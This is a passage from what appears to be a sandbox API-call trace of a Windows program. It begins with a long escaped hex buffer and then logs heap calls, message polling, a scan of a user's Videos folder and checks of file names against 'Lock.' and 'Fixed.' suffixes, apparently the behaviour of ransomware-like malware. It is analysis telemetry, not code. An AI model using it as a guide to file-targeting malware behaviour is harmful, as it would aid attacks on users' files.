e\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0257.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.702] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0257.702] TranslateMessage (lpMsg=0x8bf970) returned 0 [0257.702] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0257.702] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0257.702] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0257.702] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0257.702] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.702] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7qrN.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qrN.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rN.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0257.703] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0257.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12) returned 0x2466df0 [0257.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0257.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7qrN.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qrN.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rN.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0257.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.705] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0257.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0257.705] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0257.705] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.706] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0257.706] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0257.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/7qrN.mkv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7241f90, ftCreationTime.dwHighDateTime=0x1d4d409, ftLastAccessTime.dwLowDateTime=0xe8cee1d0, ftLastAccessTime.dwHighDateTime=0x1d4cf2c, ftLastWriteTime.dwLowDateTime=0xe8cee1d0, ftLastWriteTime.dwHighDateTime=0x1d4cf2c, nFileSizeHigh=0x0, nFileSizeLow=0x75ee, dwReserved0=0xdd0530, dwReserved1=0x100dd, cFileName="7qrN.mkv", cAlternateFileName="")) returned 0xaa5860 [0257.707] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0257.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.708] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.708] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.708] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.708] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.708] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.708] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.708] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.708] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.709] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.709] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.709] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.709] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.709] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 